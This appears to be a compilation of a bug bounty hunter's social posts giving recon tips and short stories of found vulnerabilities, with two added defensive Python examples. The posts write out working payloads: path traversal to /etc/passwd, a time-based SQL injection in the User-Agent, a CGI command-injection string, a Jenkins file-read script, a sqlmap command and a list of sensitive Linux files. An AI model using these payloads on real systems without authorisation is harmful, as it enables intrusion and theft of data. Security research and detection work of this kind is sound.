#Beginner #recon #bugbountytips #bugbounty
1- Choose a wide scope and enumerate subs using subfinder + amass + assetfinder + knockpy
2- Now run httpx and pick interesting subdomains only
3- Especially php, aspx, html, asp and old-looking websites
4- Now fuzz interesting subs with ffuf
#LFI #P1 #bugbountytips #bugbounty
1- Go to admin.site.tld/login
2- Tried to log in with wrong credentials > error
3- Send to burp repeater
4- Found a new parameter, filename, because of the error
5- Tried payload
../../../../../../../../../../../../etc/passwd
6- Full LFI ✅
#P1 #sqli #bugbountytips #bugbounty
Application was using php (whenever I see php, I test sqli first)
I tried a blind sqli payload in login params - didn't work
sprayed in User-Agent - worked ✅
User-Agent: "XOR(if(now()=sysdate(),sleep(5),0))XOR"
===> 5.xx seconds delay
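For the LFI and the User-Agent SQLi cases above, an added detection example from the defender's side (not code from the original thread): a small Python scanner over constructed access-log lines that flags decoded `..` traversal segments in the request path and time-delay SQL primitives in the User-Agent header. The log format, the sample lines and the rule names are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not real traffic): "<METHOD> <PATH> HTTP/1.1" <STATUS> "<USER-AGENT>"
SAMPLE_LOG = [
    '"GET /login?filename=report.pdf HTTP/1.1" 200 "Mozilla/5.0"',
    '"GET /login?filename=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 500 "Mozilla/5.0"',
    '"GET /dir1/dir2/%252e%252e/%252e%252e/etc/hosts HTTP/1.1" 200 "curl/8.0"',
    '"POST /login HTTP/1.1" 200 "XOR(if(now()=sysdate(),sleep(5),0))XOR"',
]
LINE_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) "(?P<ua>.*)"$')
# A ".." path segment: preceded by a non-dot character, followed by a slash, backslash or end of string.
TRAVERSAL_RE = re.compile(r'(?:^|[^.])\.\.(?:[/\\]|$)')
# Time-delay primitives used for blind injection across common database engines.
TIME_SQLI_RE = re.compile(r'\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b', re.IGNORECASE)

def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded sequences (%252e -> %2e -> .) are normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the names of the rules that fire on one log line."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparsed"]
    hits = []
    if TRAVERSAL_RE.search(decode_fully(m.group("path"))):
        hits.append("path_traversal")
    # Request headers are attacker-controlled input too: inspect the User-Agent, not only the URL.
    if TIME_SQLI_RE.search(decode_fully(m.group("ua"))):
        hits.append("time_based_sqli")
    return hits

def scan(lines):
    """Map each rule name to the 0-based indices of the lines that triggered it."""
    report = {}
    for idx, line in enumerate(lines):
        for rule in classify(line):
            report.setdefault(rule, []).append(idx)
    return report

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))  # {'path_traversal': [1, 2], 'time_based_sqli': [3]}
```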
#P1 #bugbounty #bugbountytips #bugcrowd
1- On visiting url http://domain.tld it was redirecting first to http://domain.tld/dir1/dir2 then to sso login
2- Fuzzed after first redirection
3- http://domain.tld/dir1/dir2/FUZZ
4- This payload led to 200 OK and disclosed local files
If you have access to the #jenkins dashboard
use the Script Console command below for PoC
```
def passwdFile = new File("/etc/passwd")
println passwdFile.text
```
#P1 #bugbountytips #bugbounty
If you see the screenshot below
I came back touching local files with a 500 error 😅
Payload : ../../../../../../../../../../../../../etc/passwd
Weird case, not a full #LFI
Story of a very quick RCE
Target/cgi-bin/dmt/reset.cgi?db_prefix=%26id%26
You can add these paths to your wordlist
cgi-bin/dmt/reset.cgi?db_prefix=%26id%26
cgi-bin/reset.cgi?db_prefix=%26id%26
fuzzing as well
cgi-bin/FUZZ.cgi?FUZZ=%26id%26
#bugbountytips ❤️
#New #year #Resolution
This year I decided to help at least 10 BB hunters (I will choose my own) to get their 1st bounty on any platform
Learners who are trying hard for 1 or 2 years
2 already done - @starkcharry & @TheLittleH4ck3r
💪⚡️
Keep pwning same program:
Found first P1 in Jan 2022 and now it's Dec - still finding bugs here
1- url/FUZZ
2- url/web/admin/home
3- Found login
4- Enter [ admin@domain .com :: Admin@1 ]
#bugbountytips #BugBounty
Don’t underestimate the power of /
Just found a P1
domain.tld/FUZZ
domain.tld/dir - no results
domain.tld/dir/ - unauthorised access to a monitoring panel
#bugbounty
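The /dir vs /dir/ difference above is a canonicalisation gap in access control: the rule protected one spelling of the path and the other fell through. An added Python example (not the author's code) that canonicalises the request path before the authorisation check, shown beside the naive exact-string rule; the protected prefixes and the sample paths are constructed.

```python
import posixpath
from urllib.parse import unquote

# Constructed policy: these paths and everything beneath them need an authenticated admin session.
PROTECTED_PREFIXES = ("/dir", "/web/admin")

def canonical_path(raw_url):
    """Reduce a request target to one canonical form before any authorisation decision:
    strip the query, percent-decode, resolve . and .. segments, collapse duplicate slashes,
    and drop the trailing slash so /dir, /dir/, //dir// and /%64ir/ all compare equal."""
    path = unquote(raw_url.split("?", 1)[0])
    # Force exactly one leading slash: normpath deliberately preserves a leading "//".
    path = posixpath.normpath("/" + path.lstrip("/"))
    return path.rstrip("/") or "/"

def exact_match_protected(raw_path):
    """Naive rule that compares the raw string: /dir is protected, /dir/ is not."""
    return raw_path in PROTECTED_PREFIXES

def is_protected(raw_url):
    """Robust rule: canonicalise first, then match the prefix and everything beneath it."""
    path = canonical_path(raw_url)
    return any(path == p or path.startswith(p + "/") for p in PROTECTED_PREFIXES)

if __name__ == "__main__":
    for target in ("/dir", "/dir/", "//dir//", "/public/../dir/", "/directory", "/web/admin/home/?tab=1"):
        print(f"{target:26} exact={exact_match_protected(target)!s:5} canonical={is_protected(target)}")
```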
#bbcollab ⚡️
Me & @GodfatherOrwa earned $$ for submission on @bugcrowd #ItTakesACrowd
Bug : internal secrets disclosed in dumped files
== As always I found the bug and orwa 👑 escalated it
#P1 > report > @RelentlessT7 < 10 min
I can confirm tal_bc doesn't sleep 😅
Bug :: working AWS creds were leaking in main.xx.js file
Found this file in view-source
- visited view-source & searched '.js'
- validated AWS secret with @streaak github repo
github.com/streaak/keyhacks#…
#Recon 🫰
4 SQLi, 2 blind XSS, 3 reflected XSS on old fav program
plus 1 admin last week (by full port scan)
I hunt on this program 2 times /month and find bugs every time
Read blog > got new idea > write down in notes > do recon again > hunt with notes
+ #TakeCareOFYourHealth
SQLi or not? #BugBounty
So it was POST /xxx.php HTTP/1.1
with multipart params
> .php 👀 should I try sqli?
> replaced one param with *
> saved as r.txt
cmd - python3 sqlmap.py -r r.txt --level 5 --risk 3 --dbs --time-sec=15 --hostname
Will post if it succeeds
1/n
November goal :
25 bugs / week all platforms combined
30 push ups on each N/A or dup :)
5 P1 or critical at least
If I miss the P1 goal - will give away subs of their choice (prettyrecon / htb / pentesterlab) to 5 random winners
My goals for 2022
1) Only cert - @Bugcrowd CPT
2) 10X Bounties than last year
3) Hack more RDPs
4) Collaboration with a few awesome hackers
5) Do charity
6) Gift a bike or car to myself
7) Daily 1 hr for health.
8) Will share more bugbounty tips :)
#bugbounty #infosec #hacking
Few ways to try on #admin
- Default login (panel based - google)
- Response manipulation
- Admin bruteforce with top 10k passwords
**only if bruteforce is in scope**
- Fuzz for hidden register/signup page then signup as admin (rare)
Thank you everyone for following ❤️
I have 10k friends now,
Will send 10 gifts 🎁 to the first 10 randomly generated numbers
just comment a number out of 1-10,000 👇
and 11th gift to the last follower
#Giveaway
Found another weird #P1
PII leakage of 15k users
#tip - fuzz faster you fool aka #ffuf
Started ffuf: 301 - django error
ran ffuf again -mc 200 : Critical PII disclosure 💸💸
Local files for Linux:
/etc/passwd
/etc/shadow
/etc/shells
/etc/group
/etc/profile
/etc/hosts
/proc/self/environ
/proc/self/status
/proc/mounts
#bugbountytips #BugBounty
I want to share a small story of life.
From my first P1 till date, it was @GodfatherOrwa behind most of my P1 successes
I started hunting for P1s after reading his blog.
You are a gifted brother. Many times when I had any doubt on bugs, I sent it to you
always record video PoC for high & crits
always record video PoC for high & crits
always record video PoC for high & crits
always record video PoC for high & crits
.
.
else customer may cheat >>>>>>>>>>
Testing multiple targets at a time may or may not lead to good bounties
But sticking with one wide-scope target and testing it at regular intervals will teach you cool things
Hunt > take break > read blogs > make notes (sublime) & hunt again
#bugbounty
Found 25+ different critical bugs on @Hacker0x01
but ended up reporting them in just 4–5 reports.
because I hate writing lengthy reports with all my heart >>